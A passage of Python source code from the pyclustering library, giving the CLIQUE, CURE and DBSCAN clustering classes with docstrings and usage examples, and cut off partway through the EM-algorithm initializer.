because CLIQUE operates with blocks, not with points:
@image html clique_clustering_with_noise.png "Fig. 2. Noise allocation by CLIQUE."
"""
def __init__(self, data, amount_intervals, density_threshold, **kwargs):
"""!
@brief Create CLIQUE clustering algorithm.
@param[in] data (list): Input data (list of points) that should be clustered.
@param[in] amount_intervals (uint): Amount of intervals in each dimension that defines amount of CLIQUE blocks
as \f[N_{blocks} = intervals^{dimensions}\f].
@param[in] density_threshold (uint): Minimum number of points that should contain CLIQUE block to consider its
points as non-outliers.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'ccore').
<b>Keyword Args:</b><br>
- ccore (bool): By default is True. If True then C++ implementation is used for cluster analysis, otherwise
Python implementation is used.
"""
self.__data = data
self.__amount_intervals = amount_intervals
self.__density_threshold = density_threshold
self.__ccore = kwargs.get('ccore', True)
if self.__ccore:
self.__ccore = ccore_library.workable()
self.__clusters = []
self.__noise = []
self.__cells = []
self.__cells_map = {}
self.__validate_arguments()
def process(self):
"""!
@brief Performs clustering process in line with rules of CLIQUE clustering algorithm.
@return (clique) Returns itself (CLIQUE instance).
@see get_clusters()
@see get_noise()
@see get_cells()
"""
if self.__ccore:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def get_clusters(self):
"""!
@brief Returns allocated clusters.
@remark Allocated clusters are returned only after data processing (method process()). Otherwise empty list is returned.
@return (list) List of allocated clusters, each cluster contains indexes of objects in list of data.
@see process()
@see get_noise()
"""
return self.__clusters
def get_noise(self):
"""!
@brief Returns allocated noise.
@remark Allocated noise is returned only after data processing (method process()). Otherwise empty list is returned.
@return (list) List of indexes that are marked as a noise.
@see process()
@see get_clusters()
"""
return self.__noise
def get_cells(self):
"""!
@brief Returns CLIQUE blocks that are formed during clustering process.
@details CLIQUE blocks can be used for visualization purposes. Each CLIQUE block contain its logical location
in grid, spatial location in data space and points that belong to block.
@return (list) List of CLIQUE blocks.
"""
return self.__cells
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using C++ implementation of CLIQUE algorithm that is used by default if
user's target platform is supported.
"""
result = wrapper.clique(self.__data, self.__amount_intervals, self.__density_threshold)
(self.__clusters, self.__noise, block_logical_locations, max_corners, min_corners, block_points) = result
amount_cells = len(block_logical_locations)
for i in range(amount_cells):
self.__cells.append(clique_block(block_logical_locations[i],
spatial_block(max_corners[i], min_corners[i]),
block_points[i],
True))
def __process_by_python(self):
"""!
@brief Performs cluster analysis using Python implementation of CLIQUE algorithm.
"""
self.__create_grid()
self.__allocate_clusters()
self.__cells_map.clear()
def __validate_arguments(self):
"""!
@brief Check input arguments of CLIQUE algorithm and if one of them is not correct then appropriate exception
is thrown.
"""
if len(self.__data) == 0:
raise ValueError("Empty input data. Data should contain at least one point.")
if self.__amount_intervals <= 0:
raise ValueError("Incorrect amount of intervals '%d'. Amount of intervals value should be greater than 0." % self.__amount_intervals)
if self.__density_threshold < 0:
raise ValueError("Incorrect density threshold '%f'. Density threshold should not be negative." % self.__density_threshold)
def __allocate_clusters(self):
"""!
@brief Performs cluster analysis using formed CLIQUE blocks.
"""
for cell in self.__cells:
if cell.visited is False:
self.__expand_cluster(cell)
def __expand_cluster(self, cell):
"""!
@brief Tries to expand cluster from specified cell.
@details During expanding points are marked as noise or append to new cluster.
@param[in] cell (clique_block): CLIQUE block from that cluster should be expanded.
"""
cell.visited = True
if len(cell.points) <= self.__density_threshold:
if len(cell.points) > 0:
self.__noise.extend(cell.points)
return
cluster = cell.points[:]
neighbors = self.__get_neighbors(cell)
for neighbor in neighbors:
if len(neighbor.points) > self.__density_threshold:
cluster.extend(neighbor.points)
neighbors += self.__get_neighbors(neighbor)
elif len(neighbor.points) > 0:
self.__noise.extend(neighbor.points)
self.__clusters.append(cluster)
def __get_neighbors(self, cell):
"""!
@brief Returns neighbors for specified CLIQUE block as clique_block objects.
@return (list) Neighbors as clique_block objects.
"""
neighbors = []
location_neighbors = cell.get_location_neighbors(self.__amount_intervals)
for i in range(len(location_neighbors)):
key = self.__location_to_key(location_neighbors[i])
candidate_neighbor = self.__cell_map[key]
if not candidate_neighbor.visited:
candidate_neighbor.visited = True
neighbors.append(candidate_neighbor)
return neighbors
def __create_grid(self):
"""!
@brief Creates CLIQUE grid that consists of CLIQUE blocks for clustering process.
"""
data_sizes, min_corner, max_corner = self.__get_data_size_derscription()
dimension = len(self.__data[0])
cell_sizes = [dimension_length / self.__amount_intervals for dimension_length in data_sizes]
self.__cells = [clique_block() for _ in range(pow(self.__amount_intervals, dimension))]
iterator = coordinate_iterator(dimension, self.__amount_intervals)
point_availability = [True] * len(self.__data)
self.__cell_map = {}
for index_cell in range(len(self.__cells)):
logical_location = iterator.get_coordinate()
iterator.increment()
self.__cells[index_cell].logical_location = logical_location[:]
cur_max_corner, cur_min_corner = self.__get_spatial_location(logical_location, min_corner, max_corner, cell_sizes)
self.__cells[index_cell].spatial_location = spatial_block(cur_max_corner, cur_min_corner)
self.__cells[index_cell].capture_points(self.__data, point_availability)
self.__cell_map[self.__location_to_key(logical_location)] = self.__cells[index_cell]
def __location_to_key(self, location):
"""!
@brief Forms key using logical location of a CLIQUE block.
@return (string) Key for CLIQUE block map.
"""
return ''.join(str(e) + '.' for e in location)
def __get_spatial_location(self, logical_location, min_corner, max_corner, cell_sizes):
"""!
@brief Calculates spatial location for CLIQUE block with logical coordinates defined by logical_location.
@param[in] logical_location (list): Logical location of CLIQUE block for that spatial location should be calculated.
@param[in] min_corner (list): Minimum corner of an input data.
@param[in] max_corner (list): Maximum corner of an input data.
@param[in] cell_sizes (list): Size of CLIQUE block in each dimension.
@return (list, list): Maximum and minimum corners for the specified CLIQUE block.
"""
cur_min_corner = min_corner[:]
cur_max_corner = min_corner[:]
dimension = len(self.__data[0])
for index_dimension in range(dimension):
cur_min_corner[index_dimension] += cell_sizes[index_dimension] * logical_location[index_dimension]
if logical_location[index_dimension] == self.__amount_intervals - 1:
cur_max_corner[index_dimension] = max_corner[index_dimension]
else:
cur_max_corner[index_dimension] = cur_min_corner[index_dimension] + cell_sizes[index_dimension]
return cur_max_corner, cur_min_corner
def __get_data_size_derscription(self):
"""!
@brief Calculates input data description that is required to create CLIQUE grid.
@return (list, list, list): Data size in each dimension, minimum and maximum corners.
"""
min_corner = self.__data[0][:]
max_corner = self.__data[0][:]
dimension = len(self.__data[0])
for index_point in range(1, len(self.__data)):
for index_dimension in range(dimension):
coordinate = self.__data[index_point][index_dimension]
if coordinate > max_corner[index_dimension]:
max_corner[index_dimension] = coordinate
if coordinate < min_corner[index_dimension]:
min_corner[index_dimension] = coordinate
data_sizes = [0.0] * dimension
for index_dimension in range(dimension):
data_sizes[index_dimension] = max_corner[index_dimension] - min_corner[index_dimension]
return data_sizes, min_corner, max_corner
```
#### File: pyclustering/cluster/cure.py
```python
import numpy
from pyclustering.cluster.encoder import type_encoding
from pyclustering.utils import euclidean_distance_square
from pyclustering.container.kdtree import kdtree
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.cure_wrapper as wrapper
class cure_cluster:
"""!
@brief Represents data cluster in CURE term.
@details CURE cluster is described by points of cluster, representation points of the cluster and by the cluster center.
"""
def __init__(self, point, index):
"""!
@brief Constructor of CURE cluster.
@param[in] point (list): Point represented by list of coordinates.
@param[in] index (uint): Index point in dataset.
"""
## List of points that make up cluster.
self.points = [ ]
## Point indexes in dataset.
self.indexes = -1
## Mean of points that make up cluster.
self.mean = None
## List of points that represents clusters.
self.rep = [ ]
if point is not None:
self.points = [ point ]
self.indexes = [ index ]
self.mean = point
self.rep = [ point ]
## Pointer to the closest cluster.
self.closest = None
## Distance to the closest cluster.
self.distance = float('inf') # calculation of distance is really complexity operation (even square distance), so let's store distance to closest cluster.
def __repr__(self):
"""!
@brief Displays distance to closest cluster and points that are contained by current cluster.
"""
return "%s, %s" % (self.distance, self.points)
class cure:
"""!
@brief Class represents clustering algorithm CURE with KD-tree optimization.
@details CCORE option can be used to use the pyclustering core - C/C++ shared library for processing that significantly increases performance.
Here is an example how to perform cluster analysis of sample 'Lsun':
@code
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.cure import cure;
from pyclustering.utils import read_sample;
from pyclustering.samples.definitions import FCPS_SAMPLES;
# Input data in following format [ [0.1, 0.5], [0.3, 0.1], ... ].
input_data = read_sample(FCPS_SAMPLES.SAMPLE_LSUN);
# Allocate three clusters.
cure_instance = cure(input_data, 3);
cure_instance.process();
clusters = cure_instance.get_clusters();
# Visualize allocated clusters.
visualizer = cluster_visualizer();
visualizer.append_clusters(clusters, input_data);
visualizer.show();
@endcode
"""
def __init__(self, data, number_cluster, number_represent_points = 5, compression = 0.5, ccore = True):
"""!
@brief Constructor of clustering algorithm CURE.
@param[in] data (array_like): Input data that should be processed.
@param[in] number_cluster (uint): Number of clusters that should be allocated.
@param[in] number_represent_points (uint): Number of representative points for each cluster.
@param[in] compression (double): Coefficient defines level of shrinking of representation points toward the mean of the new created cluster after merging on each step. Usually it destributed from 0 to 1.
@param[in] ccore (bool): If True then CCORE (C++ solution) will be used for solving.
"""
self.__pointer_data = self.__prepare_data_points(data)
self.__clusters = None
self.__representors = None
self.__means = None
self.__number_cluster = number_cluster
self.__number_represent_points = number_represent_points
self.__compression = compression
self.__ccore = ccore
if self.__ccore:
self.__ccore = ccore_library.workable()
self.__validate_arguments()
def process(self):
"""!
@brief Performs cluster analysis in line with rules of CURE algorithm.
@return (cure) Returns itself (CURE instance).
@see get_clusters()
"""
if self.__ccore is True:
self.__process_by_ccore()
else:
self.__process_by_python()
return self
def __process_by_ccore(self):
"""!
@brief Performs cluster analysis using CCORE (C/C++ part of pyclustering library).
"""
cure_data_pointer = wrapper.cure_algorithm(self.__pointer_data, self.__number_cluster,
self.__number_represent_points, self.__compression)
self.__clusters = wrapper.cure_get_clusters(cure_data_pointer)
self.__representors = wrapper.cure_get_representors(cure_data_pointer)
self.__means = wrapper.cure_get_means(cure_data_pointer)
wrapper.cure_data_destroy(cure_data_pointer)
def __process_by_python(self):
"""!
@brief Performs cluster analysis using python code.
"""
self.__create_queue() # queue
self.__create_kdtree() # create k-d tree
while len(self.__queue) > self.__number_cluster:
cluster1 = self.__queue[0] # cluster that has nearest neighbor.
cluster2 = cluster1.closest # closest cluster.
self.__queue.remove(cluster1)
self.__queue.remove(cluster2)
self.__delete_represented_points(cluster1)
self.__delete_represented_points(cluster2)
merged_cluster = self.__merge_clusters(cluster1, cluster2)
self.__insert_represented_points(merged_cluster)
# Pointers to clusters that should be relocated is stored here.
cluster_relocation_requests = []
# Check for the last cluster
if len(self.__queue) > 0:
merged_cluster.closest = self.__queue[0] # arbitrary cluster from queue
merged_cluster.distance = self.__cluster_distance(merged_cluster, merged_cluster.closest)
for item in self.__queue:
distance = self.__cluster_distance(merged_cluster, item)
# Check if distance between new cluster and current is the best than now.
if distance < merged_cluster.distance:
merged_cluster.closest = item
merged_cluster.distance = distance
# Check if current cluster has removed neighbor.
if (item.closest is cluster1) or (item.closest is cluster2):
# If previous distance was less then distance to new cluster then nearest cluster should
# be found in the tree.
if item.distance < distance:
(item.closest, item.distance) = self.__closest_cluster(item, distance)
# TODO: investigation is required. There is assumption that itself and merged cluster
# should be always in list of neighbors in line with specified radius. But merged cluster
# may not be in list due to error calculation, therefore it should be added manually.
if item.closest is None:
item.closest = merged_cluster
item.distance = distance
else:
item.closest = merged_cluster
item.distance = distance
cluster_relocation_requests.append(item)
# New cluster and updated clusters should relocated in queue
self.__insert_cluster(merged_cluster)
for item in cluster_relocation_requests:
self.__relocate_cluster(item)
# Change cluster representation
self.__clusters = [cure_cluster_unit.indexes for cure_cluster_unit in self.__queue]
self.__representors = [cure_cluster_unit.rep for cure_cluster_unit in self.__queue]
self.__means = [cure_cluster_unit.mean for cure_cluster_unit in self.__queue]
def get_clusters(self):
"""!
@brief Returns list of allocated clusters, each cluster contains indexes of objects in list of data.
@return (list) List of allocated clusters.
@see process()
@see get_representors()
@see get_means()
"""
return self.__clusters
def get_representors(self):
"""!
@brief Returns list of point-representors of each cluster.
@details Cluster index should be used for navigation between lists of point-representors.
@return (list) List of point-representors of each cluster.
@see get_clusters()
@see get_means()
"""
return self.__representors
def get_means(self):
"""!
@brief Returns list of mean values of each cluster.
@details Cluster index should be used for navigation between mean values.
@return (list) List of mean values of each cluster.
@see get_clusters()
@see get_representors()
"""
return self.__means
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __prepare_data_points(self, sample):
"""!
@brief Prepare data points for clustering.
@details In case of numpy.array there are a lot of overloaded basic operators, such as __contains__, __eq__.
@return (list) Returns sample in list format.
"""
if isinstance(sample, numpy.ndarray):
return sample.tolist()
return sample
def __validate_arguments(self):
"""!
@brief Check input arguments of BANG algorithm and if one of them is not correct then appropriate exception
is thrown.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Empty input data. Data should contain at least one point.")
if self.__number_cluster <= 0:
raise ValueError("Incorrect amount of clusters '%d'. Amount of cluster should be greater than 0." % self.__number_cluster)
if self.__compression < 0:
raise ValueError("Incorrect compression level '%f'. Compression should not be negative." % self.__compression)
if self.__number_represent_points <= 0:
raise ValueError("Incorrect amount of representatives '%d'. Amount of representatives should be greater than 0." % self.__number_cluster)
def __insert_cluster(self, cluster):
"""!
@brief Insert cluster to the list (sorted queue) in line with sequence order (distance).
@param[in] cluster (cure_cluster): Cluster that should be inserted.
"""
for index in range(len(self.__queue)):
if cluster.distance < self.__queue[index].distance:
self.__queue.insert(index, cluster)
return
self.__queue.append(cluster)
def __relocate_cluster(self, cluster):
"""!
@brief Relocate cluster in list in line with distance order.
@param[in] cluster (cure_cluster): Cluster that should be relocated in line with order.
"""
self.__queue.remove(cluster)
self.__insert_cluster(cluster)
def __closest_cluster(self, cluster, distance):
"""!
@brief Find closest cluster to the specified cluster in line with distance.
@param[in] cluster (cure_cluster): Cluster for which nearest cluster should be found.
@param[in] distance (double): Closest distance to the previous cluster.
@return (tuple) Pair (nearest CURE cluster, nearest distance) if the nearest cluster has been found, otherwise None is returned.
"""
nearest_cluster = None
nearest_distance = float('inf')
real_euclidean_distance = distance ** 0.5
for point in cluster.rep:
# Nearest nodes should be returned (at least it will return itself).
nearest_nodes = self.__tree.find_nearest_dist_nodes(point, real_euclidean_distance)
for (candidate_distance, kdtree_node) in nearest_nodes:
if (candidate_distance < nearest_distance) and (kdtree_node is not None) and (kdtree_node.payload is not cluster):
nearest_distance = candidate_distance
nearest_cluster = kdtree_node.payload
return (nearest_cluster, nearest_distance)
def __insert_represented_points(self, cluster):
"""!
@brief Insert representation points to the k-d tree.
@param[in] cluster (cure_cluster): Cluster whose representation points should be inserted.
"""
for point in cluster.rep:
self.__tree.insert(point, cluster)
def __delete_represented_points(self, cluster):
"""!
@brief Remove representation points of clusters from the k-d tree
@param[in] cluster (cure_cluster): Cluster whose representation points should be removed.
"""
for point in cluster.rep:
self.__tree.remove(point, payload=cluster)
def __merge_clusters(self, cluster1, cluster2):
"""!
@brief Merges two clusters and returns new merged cluster. Representation points and mean points are calculated for the new cluster.
@param[in] cluster1 (cure_cluster): Cluster that should be merged.
@param[in] cluster2 (cure_cluster): Cluster that should be merged.
@return (cure_cluster) New merged CURE cluster.
"""
merged_cluster = cure_cluster(None, None)
merged_cluster.points = cluster1.points + cluster2.points
merged_cluster.indexes = cluster1.indexes + cluster2.indexes
# merged_cluster.mean = ( len(cluster1.points) * cluster1.mean + len(cluster2.points) * cluster2.mean ) / ( len(cluster1.points) + len(cluster2.points) );
dimension = len(cluster1.mean)
merged_cluster.mean = [0] * dimension
if merged_cluster.points[1:] == merged_cluster.points[:-1]:
merged_cluster.mean = merged_cluster.points[0]
else:
for index in range(dimension):
merged_cluster.mean[index] = ( len(cluster1.points) * cluster1.mean[index] + len(cluster2.points) * cluster2.mean[index] ) / ( len(cluster1.points) + len(cluster2.points) );
temporary = list()
for index in range(self.__number_represent_points):
maximal_distance = 0
maximal_point = None
for point in merged_cluster.points:
minimal_distance = 0
if index == 0:
minimal_distance = euclidean_distance_square(point, merged_cluster.mean)
#minimal_distance = euclidean_distance_sqrt(point, merged_cluster.mean);
else:
minimal_distance = min([euclidean_distance_square(point, p) for p in temporary])
#minimal_distance = cluster_distance(cure_cluster(point), cure_cluster(temporary[0]));
if minimal_distance >= maximal_distance:
maximal_distance = minimal_distance
maximal_point = point
if maximal_point not in temporary:
temporary.append(maximal_point)
for point in temporary:
representative_point = [0] * dimension
for index in range(dimension):
representative_point[index] = point[index] + self.__compression * (merged_cluster.mean[index] - point[index])
merged_cluster.rep.append(representative_point)
return merged_cluster
def __create_queue(self):
"""!
@brief Create queue of sorted clusters by distance between them, where first cluster has the nearest neighbor. At the first iteration each cluster contains only one point.
@param[in] data (list): Input data that is presented as list of points (objects), each point should be represented by list or tuple.
@return (list) Create queue of sorted clusters by distance between them.
"""
self.__queue = [cure_cluster(self.__pointer_data[index_point], index_point) for index_point in range(len(self.__pointer_data))]
# set closest clusters
for i in range(0, len(self.__queue)):
minimal_distance = float('inf')
closest_index_cluster = -1
for k in range(0, len(self.__queue)):
if i != k:
dist = self.__cluster_distance(self.__queue[i], self.__queue[k])
if dist < minimal_distance:
minimal_distance = dist
closest_index_cluster = k
self.__queue[i].closest = self.__queue[closest_index_cluster]
self.__queue[i].distance = minimal_distance
# sort clusters
self.__queue.sort(key=lambda x: x.distance, reverse = False)
def __create_kdtree(self):
"""!
@brief Create k-d tree in line with created clusters. At the first iteration contains all points from the input data set.
@return (kdtree) k-d tree that consist of representative points of CURE clusters.
"""
representatives, payloads = [], []
for current_cluster in self.__queue:
for representative_point in current_cluster.rep:
representatives.append(representative_point)
payloads.append(current_cluster)
# initialize it using constructor to have balanced tree at the beginning to ensure the highest performance
# when we have the biggest amount of nodes in the tree.
self.__tree = kdtree(representatives, payloads)
def __cluster_distance(self, cluster1, cluster2):
"""!
@brief Calculate minimal distance between clusters using representative points.
@param[in] cluster1 (cure_cluster): The first cluster.
@param[in] cluster2 (cure_cluster): The second cluster.
@return (double) Euclidean distance between two clusters that is defined by minimum distance between representation points of two clusters.
"""
distance = float('inf')
for i in range(0, len(cluster1.rep)):
for k in range(0, len(cluster2.rep)):
dist = euclidean_distance_square(cluster1.rep[i], cluster2.rep[k]) # Fast mode
if dist < distance:
distance = dist
return distance
```
#### File: pyclustering/cluster/dbscan.py
```python
from pyclustering.container.kdtree import kdtree_balanced
from pyclustering.cluster.encoder import type_encoding
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.dbscan_wrapper as wrapper
class dbscan:
"""!
@brief Class represents clustering algorithm DBSCAN.
@details This DBSCAN algorithm is KD-tree optimized.
By default C/C++ pyclustering library is used for processing that significantly increases performance.
Clustering example where DBSCAN algorithm is used to process `Chainlink` data from `FCPS` collection:
@code
from pyclustering.cluster.dbscan import dbscan
from pyclustering.cluster import cluster_visualizer
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FCPS_SAMPLES
# Sample for cluster analysis.
sample = read_sample(FCPS_SAMPLES.SAMPLE_CHAINLINK)
# Create DBSCAN algorithm.
dbscan_instance = dbscan(sample, 0.7, 3)
# Start processing by DBSCAN.
dbscan_instance.process()
# Obtain results of clustering.
clusters = dbscan_instance.get_clusters()
noise = dbscan_instance.get_noise()
# Visualize clustering results
visualizer = cluster_visualizer()
visualizer.append_clusters(clusters, sample)
visualizer.append_cluster(noise, sample, marker='x')
visualizer.show()
@endcode
"""
def __init__(self, data, eps, neighbors, ccore=True, **kwargs):
"""!
@brief Constructor of clustering algorithm DBSCAN.
@param[in] data (list): Input data that is presented as list of points or distance matrix (defined by parameter
'data_type', by default data is considered as a list of points).
@param[in] eps (double): Connectivity radius between points, points may be connected if distance between them less then the radius.
@param[in] neighbors (uint): minimum number of shared neighbors that is required for establish links between points.
@param[in] ccore (bool): if True than DLL CCORE (C++ solution) will be used for solving the problem.
@param[in] **kwargs: Arbitrary keyword arguments (available arguments: 'data_type').
<b>Keyword Args:</b><br>
- data_type (string): Data type of input sample 'data' that is processed by the algorithm ('points', 'distance_matrix').
"""
self.__pointer_data = data
self.__kdtree = None
self.__eps = eps
self.__sqrt_eps = eps * eps
self.__neighbors = neighbors
self.__visited = None
self.__belong = None
self.__data_type = kwargs.get('data_type', 'points')
self.__clusters = []
self.__noise = []
self.__neighbor_searcher = None
self.__initialize_ccore_state(ccore)
self.__verify_arguments()
def __getstate__(self):
"""!
@brief Returns current state of the algorithm.
@details It does not return internal temporal variables that are not visible for a user.
@return (tuple) Current state of the algorithm.
"""
return (self.__pointer_data, self.__eps, self.__sqrt_eps, self.__neighbors, self.__visited, self.__belong,
self.__data_type, self.__clusters, self.__noise, self.__ccore)
def __setstate__(self, state):
"""!
@brief Set current state of the algorithm.
@details Set state method checks if C++ pyclustering is available for the current platform, as a result `ccore`
state might be different if state is moved between platforms.
"""
self.__pointer_data, self.__eps, self.__sqrt_eps, self.__neighbors, self.__visited, self.__belong, \
self.__data_type, self.__clusters, self.__noise, self.__ccore = state
self.__initialize_ccore_state(True)
def process(self):
"""!
@brief Performs cluster analysis in line with rules of DBSCAN algorithm.
@return (dbscan) Returns itself (DBSCAN instance).
@see get_clusters()
@see get_noise()
"""
if self.__ccore is True:
(self.__clusters, self.__noise) = wrapper.dbscan(self.__pointer_data, self.__eps, self.__neighbors, self.__data_type)
else:
if self.__data_type == 'points':
self.__kdtree = kdtree_balanced(self.__pointer_data, range(len(self.__pointer_data)))
self.__visited = [False] * len(self.__pointer_data)
self.__belong = [False] * len(self.__pointer_data)
self.__neighbor_searcher = self.__create_neighbor_searcher(self.__data_type)
for i in range(0, len(self.__pointer_data)):
if self.__visited[i] is False:
cluster = self.__expand_cluster(i)
if cluster is not None:
self.__clusters.append(cluster)
for i in range(0, len(self.__pointer_data)):
if self.__belong[i] is False:
self.__noise.append(i)
return self
def get_clusters(self):
"""!
@brief Returns allocated clusters.
@remark Allocated clusters can be returned only after data processing (use method process()). Otherwise empty list is returned.
@return (list) List of allocated clusters, each cluster contains indexes of objects in list of data.
@see process()
@see get_noise()
"""
return self.__clusters
def get_noise(self):
"""!
@brief Returns allocated noise.
@remark Allocated noise can be returned only after data processing (use method process() before). Otherwise empty list is returned.
@return (list) List of indexes that are marked as a noise.
@see process()
@see get_clusters()
"""
return self.__noise
def get_cluster_encoding(self):
"""!
@brief Returns clustering result representation type that indicate how clusters are encoded.
@return (type_encoding) Clustering result representation.
@see get_clusters()
"""
return type_encoding.CLUSTER_INDEX_LIST_SEPARATION
def __verify_arguments(self):
"""!
@brief Verify input parameters for the algorithm and throw exception in case of incorrectness.
"""
if len(self.__pointer_data) == 0:
raise ValueError("Input data is empty (size: '%d')." % len(self.__pointer_data))
if self.__eps < 0:
raise ValueError("Connectivity radius (current value: '%d') should be greater or equal to 0." % self.__eps)
def __create_neighbor_searcher(self, data_type):
"""!
@brief Returns neighbor searcher in line with data type.
@param[in] data_type (string): Data type (points or distance matrix).
"""
if data_type == 'points':
return self.__neighbor_indexes_points
elif data_type == 'distance_matrix':
return self.__neighbor_indexes_distance_matrix
else:
raise TypeError("Unknown type of data is specified '%s'" % data_type)
def __expand_cluster(self, index_point):
"""!
@brief Expands cluster from specified point in the input data space.
@param[in] index_point (list): Index of a point from the data.
@return (list) Return tuple of list of indexes that belong to the same cluster and list of points that are marked as noise: (cluster, noise), or None if nothing has been expanded.
"""
cluster = None
self.__visited[index_point] = True
neighbors = self.__neighbor_searcher(index_point)
if len(neighbors) >= self.__neighbors:
cluster = [index_point]
self.__belong[index_point] = True
for i in neighbors:
if self.__visited[i] is False:
self.__visited[i] = True
next_neighbors = self.__neighbor_searcher(i)
if len(next_neighbors) >= self.__neighbors:
neighbors += [k for k in next_neighbors if ( (k in neighbors) == False) and k != index_point]
if self.__belong[i] is False:
cluster.append(i)
self.__belong[i] = True
return cluster
def __neighbor_indexes_points(self, index_point):
"""!
@brief Return neighbors of the specified object in case of sequence of points.
@param[in] index_point (uint): Index point whose neighbors are should be found.
@return (list) List of indexes of neighbors in line the connectivity radius.
"""
kdnodes = self.__kdtree.find_nearest_dist_nodes(self.__pointer_data[index_point], self.__eps)
return [node_tuple[1].payload for node_tuple in kdnodes if node_tuple[1].payload != index_point]
def __neighbor_indexes_distance_matrix(self, index_point):
"""!
@brief Return neighbors of the specified object in case of distance matrix.
@param[in] index_point (uint): Index point whose neighbors are should be found.
@return (list) List of indexes of neighbors in line the connectivity radius.
"""
distances = self.__pointer_data[index_point]
return [index_neighbor for index_neighbor in range(len(distances))
if ((distances[index_neighbor] <= self.__eps) and (index_neighbor != index_point))]
def __initialize_ccore_state(self, ccore):
"""!
@brief Initializes C++ pyclustering state.
@details Check if it is requested and if it is available for the current platform. These information is used to
set status of C++ pyclustering library.
@param[in] ccore (bool):
"""
self.__ccore = ccore
if self.__ccore:
self.__ccore = ccore_library.workable()
```
#### File: pyclustering/cluster/ema.py
```python
import numpy
import random
from pyclustering.cluster import cluster_visualizer
from pyclustering.cluster.center_initializer import kmeans_plusplus_initializer
from pyclustering.cluster.kmeans import kmeans
from pyclustering.utils import pi, calculate_ellipse_description, euclidean_distance_square
from enum import IntEnum
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import patches
def gaussian(data, mean, covariance):
"""!
@brief Calculates gaussian for dataset using specified mean (mathematical expectation) and variance or covariance in case
multi-dimensional data.
@param[in] data (list): Data that is used for gaussian calculation.
@param[in] mean (float|numpy.array): Mathematical expectation used for calculation.
@param[in] covariance (float|numpy.array): Variance or covariance matrix for calculation.
@return (list) Value of gaussian function for each point in dataset.
"""
dimension = float(len(data[0]))
if dimension != 1.0:
inv_variance = numpy.linalg.pinv(covariance)
else:
inv_variance = 1.0 / covariance
divider = (pi * 2.0) ** (dimension / 2.0) * numpy.sqrt(numpy.linalg.norm(covariance))
if divider != 0.0:
right_const = 1.0 / divider
else:
right_const = float('inf')
result = []
for point in data:
mean_delta = point - mean
point_gaussian = right_const * numpy.exp( -0.5 * mean_delta.dot(inv_variance).dot(numpy.transpose(mean_delta)) )
result.append(point_gaussian)
return result
class ema_init_type(IntEnum):
"""!
@brief Enumeration of initialization types for Expectation-Maximization algorithm.
"""
## Means are randomly taken from input dataset and variance or covariance is calculated based on
## spherical data that belongs to the chosen means.
RANDOM_INITIALIZATION = 0
## Two step initialization. The first is calculation of initial centers using K-Means++ method.
## The second is K-Means clustering using obtained centers in the first step. Obtained clusters
## and its centers are used for calculation of variance (covariance in case of multi-dimensional)
## data.
KMEANS_INITIALIZATION = 1
class ema_initializer():
"""!
@brief Provides services for preparing initial means and covariances for Expectation-Maximization algorithm.
@details Initialization strategy is defined by enumerator 'ema_init_type': random initialization and
kmeans with kmeans++ initialization. Here an example of initialization using kmeans strategy:
@code
from pyclustering.utils import read_sample
from pyclustering.samples.definitions import FAMOUS_SAMPLES
from pyclustering.cluster.ema import ema_initializer
sample = read_sample(FAMOUS_SAMPLES.SAMPLE_OLD_FAITHFUL)
amount_clusters = 2
initial_means, initial_covariance = ema_initializer(sample, amount_clusters).initialize()
print(initial_means)
print(initial_covariance)
@endcode
"""
__MAX_GENERATION_ATTEMPTS = 10
def __init__(self, sample, amount):
"""!
@brief Constructs EM initializer.
@param[in] sample (list): Data that will be used by the EM algorithm.
@param[in] amount (uint): Amount of clusters that should be allocated by the EM algorithm.
"""
self.__sample = sample
self.__amount = amount
def initialize(self, init_type = ema_init_type.KMEANS_INITIALIZATION):
"""!
@brief Calculates initial parameters for EM algorithm: means and covariances using
specified strategy.
@param[in] init_type (ema_init_type): Strategy for initialization.
@return (float|list, float|numpy.array) Initial means and variance (covariance matrix in case multi-dimensional data).
"""
if init_type == ema_init_type.KMEANS_INITIALIZATION:
return self.__initialize_kmeans()
elif init_type == ema_init_type.RANDOM_INITIALIZATION:
return self.__initialize_random()
raise NameError("Unknown type of EM algorithm initialization is specified.")
def __calculate_initial_clusters(self, centers):
"""!
@brief Calculate Euclidean distance to each point from the each cluster.
@brief Nearest points are captured by according clusters and as a result clusters are updated.
@return (list) updated clusters as list of clusters. Each cluster contains indexes of objects from data.
"""
clusters = [[] for _ in range(len(centers))]
for index_point in range(len(self.__sample)):
index_optim, dist_optim = -1, 0.0
for index in range(len(centers)):
dist = euclidean_distance_square(self.__sample[index_point], centers[index])
if (dist < dist_optim) or (index == 0):
index_optim, dist_optim = index, dist
clusters[index_optim].append(index_point)
return clusters
def __calculate_initial_covariances(self, initial_clusters):
covariances = []
for initial_cluster in initial_clusters:
if len(initial_cluster) > 1:
cluster_sample = [self.__sample[index_point] for index_point in initial_cluster]
covariances.append(numpy.cov(cluster_sample, rowvar=False))
else:
dimension = len(self.__sample[0])
covariances.append(numpy.zeros((dimension, dimension)) + random.random() / 10.0)
return covariances
def __initialize_random(self):
initial_means = []
for _ in range(self.__amount):
mean = self.__sample[ random.randint(0, len(self.__sample)) - 1 ]
attempts = 0
while (mean in initial_means) and (attempts < ema_initializer.__MAX_GENERATION_ATTEMPTS):
mean = self.__sample[ random.randint(0, len(self.__sample)) - 1 ]
attempts += 1
if attempts == ema_initializer.__MAX_GENERATION_ATTEMPTS:
mean = [ value + (random.random() - 0.5) * value * 0.2 for value in mean ]
initial_means.append(mean)
initial_clusters = self.__calculate_initial_clusters(initial_means)
initial_covariance = self.__calculate_initial_covariances(initial_clusters)
return initial_means, initial_covariance
def __initialize_kmeans(self):
initial_centers = kmeans_plusplus_initializer(self.__sample, self.__amount).initialize()
